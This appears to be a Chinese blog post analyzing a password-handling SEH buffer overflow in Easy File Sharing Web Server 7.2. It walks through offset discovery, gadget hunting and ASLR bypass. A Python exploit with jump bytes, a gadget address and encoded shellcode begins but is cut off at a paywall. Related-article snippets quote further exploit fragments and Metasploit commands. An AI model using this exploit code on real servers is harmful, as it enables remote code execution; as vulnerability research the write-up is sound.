Easy File Sharing Web Server 7.2 漏洞分析及利用

最新推荐文章于 2023-12-21 22:34:45 发布
最新推荐文章于 2023-12-21 22:34:45 发布
阅读量2.7k 收藏 1
点赞数 2
分类专栏: 溢出 文章标签: 漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_36811299/article/details/77222974
版权
本文详细分析了Easy File Sharing Web Server 7.2的缓冲区溢出漏洞,揭示了漏洞成因,即在password处理中未控制字符串长度。利用过程中,通过确定溢出点位置并寻找SEH,利用'pop pop ret'指令构造exploit代码。PoC使用Python实现,对于开启ASLR的程序,提出了利用未开启ASLR的模块来绕过保护的方法。
摘要由CSDN通过智能技术生成

1.软件简介

Easy File Sharing Web Server 是一种允许访客容易地经由浏览器上传/下载文件的文件分享系统.

2.漏洞成因

在对password进行字符串拷贝的时候,没有控制长度,导致缓冲区溢出.
这里写图片描述

3.利用过程

1.首先先向服务端发送消息,确定溢出点位置.使用winDbg跟踪发现,因为覆盖了SEH导致触发漏洞.
这里写图片描述
2.因此我们需要找到跳板指令”pop pop ret”,使用mona来查找.(尽量避免出现0x00 防止传送过程中被截断).
这里写图片描述
先找一下没有开启ASLR的模块.
这里写图片描述
这样就可以构造我们的Expolit代码了.
内存分布为:
这里写图片描述

4.PoC

代码使用python实现:

import socket, struct

host = "192.168.120.135"
port = 80

szFill = "A"*57    #61-4
szJmp = '\xeb\x08\x90\x90' #jmp 08

szAddress1 = "\x89\xa8\x01\x10"   #0x1001a889 : pop ebp # retn
szFillNop = "\x90"*3
szShellCode =  \
"\x33\xC0\xE8\xFF\xFF\xFF\xFF\xC3\x58\x8D\x70\x1B\x33\xC9\x66\xB9"\
"\x3A\x01\x8A\x04\x0E\x34\x18\x88\x04\x0E\xE2\xF6\x80\x34\x0E\x18"\
<
最低0.47元/天 解锁文章
南派小厮
关注
专栏目录
Easy File Sharing Web Server 7.2 - 'POST' 缓冲区溢出漏洞分析
giantbranch的专栏
07-26 2617
简介看到这个软件,之前不是GET请求缓冲区溢出吗? (附上我的分析链接:http://blog.csdn.net/u012763794/article/details/66970749)这次有个POST,看看有没有新鲜的东西啊!参考:https://www.exploit-db.com/exploits/42165/实验环境 WinXP sp3 中文版 EFS Web Server7.
fuzzing-03-Easy File Sharing Web Server7.2分析利用
dhfttkl123的博客
07-11 2560
0x00前言 首先,为什么没有fuzzing-02。。。因为在写02的时候,发现还是重复第一篇的相关内容,写一半就停了,不过03是我第一次分析别人没分析过的软件,并且独立编写shellcode,所以记录一下留作自己的参考。 目标:win7 x64 sp1 源:win10(python) 软件:Easy File Sharing Web Server(7.2)、Windbg、Immunity
Easy File Sharing Web Server 7.2.zip.7z
12-15
Easy File Sharing Web Server 是一种允许访客容易地经由浏览器上传/下载文件的文件分享系统,在对password进行字符串拷贝的时候,没有控制长度,导致缓冲区溢出。
SiteServer CMS (包含SiteServer Space系统) V7.2.2.zip
10-03
SiteServer CMS (包含SiteServer Space系统) V7.2.2.zip
Easy File Sharing Web Server 7.2
01-15
Easy File Sharing Web Server 是一种允许访客容易地经由浏览器上传/下载文件的文件分享系统.
漏洞复现】Easy File Sharing Web Server 漏洞的简单利用
qq_44655084的博客
12-20 1191
EFS Web Server 7.2版本中存在基于栈的缓冲区溢出漏洞。远程攻击者可通过向forum.ghp文件发送恶意的登录请求利用漏洞执行任意代码。
Easy File Sharing Server7.2漏洞复现
aarong的博客
11-04 1695
easy file sharing server7.2漏洞复现 漏洞简述 easy file sharing server缓冲区漏洞 实验环境 攻击机:kali linux 靶机:windows(这里我使用的靶机是winsever2003) 配置在同一网络环境下(同网段) 复现过程 (1)首先在靶机中安装easy file sharing server软件 (2)因为靶机有IIS可以占用了80端口,所以在这里设置一下服务部署的端口为8000,点击Restart: (3)打开网站查看是否修改成功 (4)
easy file sharing web service 7.2 buffer overflow分析
qq_41252520的博客
06-04 312
测试 【环境】:win7x86,kali 引用网上公布的资料,编写测试脚本。 首先利用msf生成一段pattern,用于后面的问题分析。 msf-pattern_create -l 5800 套用脚本 #!/usr/bin/env python # coding=utf-8 import socket from struct import pack host = '192.168.197.134' port = 80 a = socket.socket() pattern=... a.send("H
Easy File Sharing Web Server 缓冲区溢出漏洞
qq_55857040的博客
12-14 2195
目录 漏洞介绍 环境准备 复现过程 一、环境搭建 二、漏洞利用 利用漏洞 利用metasploit进行漏洞利用 在kali打开msf控制台 ​ 输入命令,寻找找到EasyFileSharing漏洞利用模块 小结 漏洞介绍 由于Easy File Sharing Web Server 6.9这个程序对输入的用户名长度不进行校验,存在缓冲区溢出漏洞,导致当用户输入太长的用户名导致缓冲区溢出,覆盖程序原本的返回地址,导致程序因跳转到非法地址奔溃或跳转到黑客控制的恶意代码地址进...
渗透之——触发Easy File Sharing Web Server 7.2 HEAD缓冲区溢出的Python脚本
冰河的专栏
01-16 8091
转载请注明出处:https://blog.csdn.net/l1028386804/article/details/86506264 脚本一: # Exploit Title: Easy File Sharing Web Server 7.2 - HEAD HTTP request SEH Buffer Overflow # Date: 2019-01-16 # Exploit Author...
最好的web文件分享工具Easy File Sharing Web Server
05-26
Easy File Sharing Web Server允许用户不需要任何附加的软件或服务就可以架设一个安全的、基于网页的P2P文件分享、传输系统。 除了HTML网页界面设计,Easy File Sharing Web Server还可以让你直接在自己的PC上快速...
easy file sharing漏洞复现任务
m0_60466340的博客
11-16 3351
在开始利用漏洞之前需要将靶机与进行攻击的主机连接在同一子网下。 网络连接好之后,查找kali的IP地址 之后就可以用nmap扫描同一子网下的所有主机的IP地址了 可以找出靶机的IP地址,再用nmap -sV命令对靶机上运行的服务和软件进行测试 可以看到目标主机的80端口上运行有easy file sharing 这个软件, 然后我们就可以利用这个软件的漏洞了。 再kali的终端查找和easy file sharing相关的漏洞模块 ~# searchsploit easy file s
easy file sharing web server 漏洞复现及Metasploit被控端与主控端的使用
最新发布
2201_75375302的博客
12-21 994
VMware,kali-linux(整个复现过程命令框都得使用超级用户权限),win7(带Service pack 1的X64版本),easy file sharing web server软件(网上可查)​红框中随便挑一个镜像,安装好虚拟机win7后千万不能将分辨率调太高,不然会卡成PPT,下面是安装完win7后需要的配置,解决屏幕过小,虚拟机和主机之间文件拖拽的问题。win7环境配置: 由于微软更新了驱动程序签名算法,2019年开始弃用SHA1,改用SHA2。
Easy File Sharing Web Server(缓冲区溢出漏洞)
Coffilater的博客
12-13 3480
缓冲区溢出简介 缓冲区溢出是指计算机向缓冲区内填充数据位数时超过了缓冲区本身的容量,溢出的数据覆盖在合法数据上。理想的情况是:程序会检查数据长度,而且并不允许输入超过缓冲区长度的字符。但是绝大多数程序都会假设数据长度总是与所分配的储存空间相匹配,这就为缓冲区溢出埋下隐患。操作系统所使用的缓冲区,又被称为“堆栈”,在各个操作进程之间,指令会被临时储存在“堆栈”当中,“堆栈”也会出现缓冲区溢出。 Easy File Sharing Web Server 漏洞复现 实验环境: 攻击机:kali L
攻防世界easy_web
qq_63928796的博客
07-22 1106
function需要自己寻找正在上传…重新上传取消︷︷().
Easy File Sharing Web Server 6.9远程溢出漏洞
weixin_30325487的博客
05-29 341
from struct import pack import socket,sys import os host="192.168.109.129" port=80 junk0 = "\x90" * 80 call_edx=pack('<L',0x1001D8C8) junk1="\x90" * 396 ppr=pack('<L',0x1...
easy file sharing server-漏洞的简单利用
weixin_44912169的博客
04-08 2267
easy file sharing server-漏洞的简单利用 1.win7靶机安装easy file sharing server 将efssetup_2018.zip解压安装到win7虚拟机中,然后将port改为8000然后点击restart即可,如下图 2.使用nmap扫描主机 nmap -sV -A -o easy-file.txt 192.168.126.132 -sV 服务版本...
卓讯EmteEasySite漏洞+拿webshell方法
收集盒 Book box
07-19 1618
卓讯智能化网站管理系统 EmteEasySite官网:http://www.emte.com.cn/百度搜:技术支持:卓讯科技直接进后台看版权是不是EmteEasy系统/main/login.asp漏洞利用:默认数据库地址可下载/db/%23EMTE^@DATEBASE.MDB下
Easy File Sharing Web Server 漏洞的简单利用
qq_51302564的博客
12-15 1175
Easy File Sharing Web Server 漏洞的简单利用 个人博客:https://fly-pluche.github.io/posts/Easy%20File%20Sharing%20Web%20Server/ 背景 EFS Easy File Sharing (EFS) Web Server是荷兰EFS Software公司的一套集论坛网站,文件上传、下载、共享和图片共享等功能的文件共享软件。 EFS EFS Web Server 7.2版本中存在基于栈的缓冲区溢出漏洞。远程攻击者
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值